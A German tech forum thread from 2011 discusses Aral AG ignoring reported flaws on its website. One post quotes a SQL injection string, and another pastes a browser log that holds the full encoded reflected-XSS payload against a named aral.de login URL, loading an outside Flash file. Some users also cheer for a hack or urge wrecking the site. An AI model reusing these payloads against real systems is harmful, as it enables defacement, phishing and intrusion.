Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 20 von 36
  1. #1
    Gesperrt Avatar von Ghandy
    Registriert seit
    Jun 2006
    Ort
    Wo es mir gefällt!
    Beiträge
    7.160
    NewsPresso
    318 (Phänomen)
    Danksagungen
    60

    Standard Die Aral AG ignoriert sämtliche Sicherheitshinweise: Wann erfolgt der Hack?

    Die Aral AG ignoriert seit Monaten die kritischen Sicherheitslücken auf ihrer Webseite. Die Kollegen von "Sicherheit Online" haben mehrfach versucht, per E-Mail oder telefonisch auf den Bug aufmerksam zu machen. Das Problem wird aber komplett ausgeschwiegen. Auch der Pressesprecher möchte dazu bislang nichts sagen. Fragt sich nur, wie lange der Deface noch auf sich warten lässt. Wir sind gespannt.

    zur News

  2. #2
    Mitglied Avatar von DukeMan999
    Registriert seit
    Apr 2000
    Ort
    Ruhrpott
    Beiträge
    3.594
    Danksagungen
    6232

    Standard Re: Die Aral AG ignoriert sämtliche Sicherheitshinweise: Wann erfolgt der Hack?

    Veröffentlicht doch direkt den exploid link vill wird dann reagiert...

    Mfg
    DukeMan

  3. #3
    Mitglied
    Registriert seit
    Nov 2009
    Ort
    Stuttgart
    Beiträge
    70
    NewsPresso
    4 (Könner)
    Danksagungen
    3

    Standard Re: Die Aral AG ignoriert sämtliche Sicherheitshinweise: Wann erfolgt der Hack?

    Sie sprachen von mehreren, greavierenden Lücken...

    Warscheinlich gibts demnächst mal wieder ' or 1=1; ---# for the lulz

    Wär typisch

    Warum sind die eig. zu doof um $mail = htmlentities(mysql_real_escape_string($_GET["emailId"])) zu schreiben? Das wärs ja schon. So einfach, und doch zu doof -.-'

  4. #4
    deaktivierter Nutzer
    deaktiviertes Benutzerkonto

    Standard Re: Die Aral AG ignoriert sämtliche Sicherheitshinweise: Wann erfolgt der Hack?

    Und wenn dann gehackt wird heulen die wieder rum. Ich sag nur selber schuld, ich hab da kein Erbarmen

  5. #5
    Gesperrt

    (Threadstarter)

    Avatar von Ghandy
    Registriert seit
    Jun 2006
    Ort
    Wo es mir gefällt!
    Beiträge
    7.160
    NewsPresso
    318 (Phänomen)
    Danksagungen
    60

    Standard Re: Die Aral AG ignoriert sämtliche Sicherheitshinweise: Wann erfolgt der Hack?

    Echt ich verstehe so etwas nicht. Man bekommt von Leuten mehrfach einen Sicherheitshinweis, wird angerufen und reagiert darauf einfach nicht. Das kann doch nicht so schwer (oder unwichtig) sein.

  6. #6
    Mitglied Avatar von G0l3m
    Registriert seit
    Jul 2007
    Beiträge
    2.735
    NewsPresso
    3 (Könner)
    Danksagungen
    22

    Standard Re: Die Aral AG ignoriert sämtliche Sicherheitshinweise: Wann erfolgt der Hack?

    Geil jetzt läuft das Super Mario Intro in Endlosschleife im Hintergrund. Dömdörööm dumdumdubum...

  7. #7
    Mitglied
    Registriert seit
    Nov 2010
    Ort
    München
    Beiträge
    179
    Danksagungen
    0

    Standard Re: Die Aral AG ignoriert sämtliche Sicherheitshinweise: Wann erfolgt der Hack?

    scheint gefixt worden zu sein.
    Oder mein Noskript hat es verhindert

    Zitat Zitat von War-10-ck Beitrag anzeigen
    Vielleicht fehlt es schlichtweg an Konsequenzen für die Unternehmen, sie sind ja nicht die Geschädigten, vielmehr ihre Kunden.
    Stimmt besser wäre es die Datenbank komplett zu löschen und einen Hinweis für die Kunden dazulassen, dann merkt es jeder der sich dort regelmäßig anmeldet und die Datensätze sind sicher.Aral hätte dann das Problem und nicht die Kunden
    Geändert von Anonym082000 (25. 07. 2011 um 11:06 Uhr)

  8. #8
    Mitglied Avatar von War-10-ck
    Registriert seit
    Mar 2009
    Ort
    nicht mehr hier.
    Beiträge
    2.556
    Danksagungen
    21

    Standard Re: Die Aral AG ignoriert sämtliche Sicherheitshinweise: Wann erfolgt der Hack?

    Wann endlich begrift man endlich, dass die Sicherheit der Besucher unbezahlbar ist?
    endlich, endlich

    Das es überhaupt noch gemeldet wird sollte einen doch wundern, dann bekommen Unternehmen sogar noch gratis Hinweise auf Sicherheitsmängel und ignorieren diese dann? Da fällt einem nichts mehr zu ein als: Dumm!

    Vielleicht fehlt es schlichtweg an Konsequenzen für die Unternehmen, sie sind ja nicht die Geschädigten, vielmehr ihre Kunden.

    War10ck

  9. #9
    deaktivierter Nutzer
    deaktiviertes Benutzerkonto

    Standard Re: Die Aral AG ignoriert sämtliche Sicherheitshinweise: Wann erfolgt der Hack?

    Wenns so weit ist, bitte beim Sprittpreis das Komma eine Stelle nach links verschieben.

  10. #10
    Mitglied
    Registriert seit
    Feb 2010
    Beiträge
    303
    Danksagungen
    1

    Standard Re: Die Aral AG ignoriert sämtliche Sicherheitshinweise: Wann erfolgt der Hack?

    Zitat Zitat von Anonym082000 Beitrag anzeigen
    scheint gefixt worden zu sein.
    Oder mein Noskript hat es verhindert
    nix gefixt, war dein noscript

  11. #11
    Mitglied
    Registriert seit
    Dec 2010
    Beiträge
    17
    Danksagungen
    0

    Standard Re: Die Aral AG ignoriert sämtliche Sicherheitshinweise: Wann erfolgt der Hack?

    ich bleib wieder leer aus



    ps bei opera in der neusten version gehts
    und chrome zeigt bei mir alles außer des flash.. vll nicht installiert ka

    Code:
    [NoScript XSS] Eine verdächtige Anfrage wurde bereinigt. Original-URL [http://www.aral.de/aral/loginaction.do?serviceLevel=2&categoryId=5005&emailId=%22%3E%3Cscript%3Ealert%28%27Hopp...ne%20Runde%20Super%20Mario!%27%29%3C%2fscript%3E%3Cobject%20height%3D%22315%22%20width%3D%22420%22%20align%3D%22middle%22%20classid%3D%22clsid%3Ad27cdb6e-ae6d-11cf-96b8-444553540000%22%20codebase%3D%22http%3A%2f%2ffpdownload.macromedia.com%2fpub%2fshockwave%2fcabs%2fflash%2fswflash.cab%23version%3D8%2C0%2C0%2C0%22%20id%3D%22SMF_v3.0%22%3E%0A%0A%20%20%20%20%20%20%3Cparam%20name%3D%22allowScriptAccess%22%20value%3D%22sameDomain%22%3E%0A%20%20%20%20%20%20%3Cparam%20name%3D%22movie%22%20value%3D%22http%3A%2f%2fwww.pouetpu-games.com%2fXO8WS%2fSMF_v3.0.swf%22%3E%0A%20%20%20%20%20%20%3Cparam%20name%3D%22menu%22%20value%3D%22false%22%3E%0A%20%20%20%20%20%20%3Cparam%20name%3D%22quality%22%20value%3D%22high%22%3E%0A%20%20%20%20%20%20%3Cparam%20name%3D%22bgcolor%22%20value%3D%22%23000000%22%3E%0A%20%20%20%20%20%20%3Cembed%20height%3D%22315%22width%3D%22420%22%20align%3D%22middle%22%20src%3D%22http%3A%2f%2fwww.pouetpu-games.com%2fXO8WS%2fSMF_v3.0.swf%22%20menu%3D%22false%22%20quality%3D%22high%22%20bgcolor%3D%22%23000000%22%20name%3D%22JKSMF_v3.0%22%20allowscriptaccess%3D%22sameDomain%22%20type%3D%22application%2fx-shockwave-flash%22%20pluginspage%3D%22http%3A%2f%2fwww.macromedia.com%2fgo%2fgetflashplayer%22%3E%0A%20%20%20%20%3C%2fobject%3E%0A%20%20%20%20%3C%2fembed%3E%3Cbr%20%2f%3E%3Cbr%20%2f%3EScheinbar%20legt%20Aral%20keinen%20Wert%20auf%20die%20Sicherheit%20der%20Besucher...%3Cbr%20%2f%3E%20Mehr%20Informationen%20-%20%3Ca%20href%3D%22http%3A%2f%2fwww.sicherheit-online.org%2fAktuelle-Themen%2fAral-AG-ignoriert-kritische-Sicherheitslucke.html%22%3EKlick!%3C%2fa%3E%3Cbr%20%2f%3E%3Cbr%20%2f%3E%3Cinput] angefordert von [chrome://browser/content/browser.xul]. Bereinigte URL: [http://xss:xss@www.aral.de/aral/loginaction.do?serviceLevel=2&categoryId=5005&emailId=%20%3E%20script%3EALERT%20%20Hopp...ne%20Runde%20Super%20Mario!%20%20%20%2Fscript%3E%20object%20height%20%20315%20width%20%20420%20align%20%20middle%20classid%20%20clsid%3Ad27cdb6e-ae6d-11cf-96b8-444553540000%20codebase%20%20http%3A%2F%2Ffpdownload.macromedia.com%2Fpub%2Fshockwave%2Fcabs%2Fflash%2Fswflash.cab%23version%208%2C0%2C0%2C0%20id%20%20SMF_v3.0%20%3E%20param%20NAME%20%20allowScriptAccess%20value%20%20sameDomain%20%3E%20param%20NAME%20%20movie%20value%20%20http%3A%2F%2Fwww.pouetpu-games.com%2FXO8WS%2FSMF_v3.0.swf%20%3E%20param%20NAME%20%20menu%20value%20%20false%20%3E%20param%20NAME%20%20quality%20value%20%20high%20%3E%20param%20NAME%20%20bgcolor%20value%20%20%23000000%20%3E%20embed%20height%20%20315%20width%20%20420%20align%20%20middle%20src%20%20http%3A%2F%2Fwww.pouetpu-games.com%2FXO8WS%2FSMF_v3.0.swf%20menu%20%20false%20quality%20%20high%20bgcolor%20%20%23000000%20NAME%20%20JKSMF_v3.0%20allowscriptaccess%20%20sameDomain%20type%20%20application%2Fx-shockwave-flash%20pluginspage%20%20http%3A%2F%2Fwww.macromedia.com%2Fgo%2Fgetflashplayer%20%3E%20%20%2Fobject%3E%20%20%2Fembed%3E%20br%20%2F%3E%20br%20%2F%3EScheinbar%20legt%20Aral%20keinen%20Wert%20auf%20die%20Sicherheit%20der%20Besucher...%20br%20%2F%3E%20Mehr%20Informationen%20-%20a%20href%20%20http%3A%2F%2Fwww.sicherheit-online.org%2FAktuelle-Themen%2FAral-AG-ignoriert-kritische-Sicherheitslucke.html%20%3EKlick!%20%2Fa%3E%20br%20%2F%3E%20br%20%2F%3E%20input#09192946619430686691].

    Edit: http://tinyurl.com/3l8es87
    Geändert von rootbox (25. 07. 2011 um 12:28 Uhr)

  12. #12
    Mitglied Avatar von Diablokiller999
    Registriert seit
    May 2003
    Beiträge
    1.489
    Danksagungen
    12

    Standard Re: Die Aral AG ignoriert sämtliche Sicherheitshinweise: Wann erfolgt der Hack?

    Und damit bald wieder ein Beispiel für "Wer nicht hören will, muss fühlen".
    Man kann sich schonmal vor die Glotze setzen und die ersten Meldungen im Ticker von N24/NTV oder so abwarten. Dann gibts ne PK auf der wieder auf die Hacker eingedroschen wird und man selbst ist das Unschuldslamm. Das aber jedes Skriptkiddie diese quasi nun offen liegenden Daten klauen kann, wird natürlich nicht erwähnt. Genauso wie die zig Warnungen die vorher kamen.

    In meinem alten Unternehmen wäre ein solcher Umgang mit Datensätzen der Ruin gewesen, aber das waren auch Krankenkassendaten, die sind (noch) etwas wichtiger als ein paar Adressen ^^

  13. #13
    deaktivierter Nutzer
    deaktiviertes Benutzerkonto

    Standard Re: Die Aral AG ignoriert sämtliche Sicherheitshinweise: Wann erfolgt der Hack?

    Vermutlich war man zuvor mehr damit beschäftigt, wie man den Autofahrern das Geld aus der Tasche mit überhöhten Benzinpreisen zieht. Da bleibt für so Kleinigkeiten keine Zeit.

  14. #14
    Mitglied
    Registriert seit
    Jan 2009
    Beiträge
    52
    Danksagungen
    0

    Standard Re: Die Aral AG ignoriert sämtliche Sicherheitshinweise: Wann erfolgt der Hack?

    Warum dramatisiert ihr das ganze so xD? Ein "deface" oder ein eindringen in die Server/Datenbanken von Aral ist damit nicht möglich. Die Lücke ermöglicht bloß ziemlich leichtes phishing.

  15. #15
    Mitglied Avatar von DukeMan999
    Registriert seit
    Apr 2000
    Ort
    Ruhrpott
    Beiträge
    3.594
    Danksagungen
    6232

    Standard Re: Die Aral AG ignoriert sämtliche Sicherheitshinweise: Wann erfolgt der Hack?

    plattmachen alles plattmachen, meiner meinung nach...

  16. #16
    Gesperrt
    Registriert seit
    Dec 2007
    Ort
    /var/www
    Beiträge
    14.867
    Danksagungen
    28

    Standard Re: Die Aral AG ignoriert sämtliche Sicherheitshinweise: Wann erfolgt der Hack?

    Zitat Zitat von Ghandy Beitrag anzeigen
    Echt ich verstehe so etwas nicht. Man bekommt von Leuten mehrfach einen Sicherheitshinweis, wird angerufen und reagiert darauf einfach nicht. Das kann doch nicht so schwer (oder unwichtig) sein.
    Zumal das fixen gemeldeter Lücken oftmals den Schwierigkeitsgrad von "Malen nach Zahlen" hat...

    @Smarag
    Voll?
    Phishing hat nichts mit Sicherheitslücken zu tun, das ist die reine Ausnutzung von Clientseitiger Dummheit. Deswegen steht überall: Ein Mitarbeiter von $Firma wird euch nie nach eurem Passwort fragen.

    Equivalent zu:
    Gib dein Passwort niemals woanders als auf unserer Homepage oder dem Gameclient ein.

    Aber auch das hilft eben nicht gegen PEBKAC.

  17. #17
    Mitglied
    Registriert seit
    Jan 2011
    Beiträge
    2
    Danksagungen
    0

    Standard Re: Die Aral AG ignoriert sämtliche Sicherheitshinweise: Wann erfolgt der Hack?

    Der Hack ist erfolgt
    Hab ich eben gesehen

    http://tinyurl.com/3vfgwj5

  18. #18
    Gesperrt

    (Threadstarter)

    Avatar von Ghandy
    Registriert seit
    Jun 2006
    Ort
    Wo es mir gefällt!
    Beiträge
    7.160
    NewsPresso
    318 (Phänomen)
    Danksagungen
    60

    Standard Re: Die Aral AG ignoriert sämtliche Sicherheitshinweise: Wann erfolgt der Hack?

    Kann ich bestätigen.

  19. #19
    Mitglied
    Registriert seit
    Jun 2011
    Beiträge
    661
    Danksagungen
    2

    Standard Re: Die Aral AG ignoriert sämtliche Sicherheitshinweise: Wann erfolgt der Hack?

    Zitat Zitat von MisterDaNS Beitrag anzeigen
    Der Hack ist erfolgt Hab ich eben gesehen http://tinyurl.com/3vfgwj5
    Dies ist nicht der Hack, auf den du gewartet hast *Jedi-Handbewegung*

    Das Gezeigte, ist ist nicht wirklich für mehr, als zum Lustigmachen, ausnutzbar. Wenn die aber auch sonst noch irgendwo das Escapen bei der Ausgabe vergessen, könnte es eventuell tatsächlich echte XSS-Möglichkeiten geben.
    Viel gefährlicher ist, wenn sie vergessen haben, die Eingabe zu escapen. Dann könnte eine klassische SQL-Injection eventuell die Datenbank präsentieren oder ändern...

  20. #20
    Mitglied Avatar von CommodoX
    Registriert seit
    Feb 2008
    Beiträge
    3.093
    Danksagungen
    20

    Standard Re: Die Aral AG ignoriert sämtliche Sicherheitshinweise: Wann erfolgt der Hack?

    Ist das hier nicht schon Hack Nummer 2?
    Grad mal Screenshot gemacht.


  21.  
     
     
Seite 1 von 2 12 LetzteLetzte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •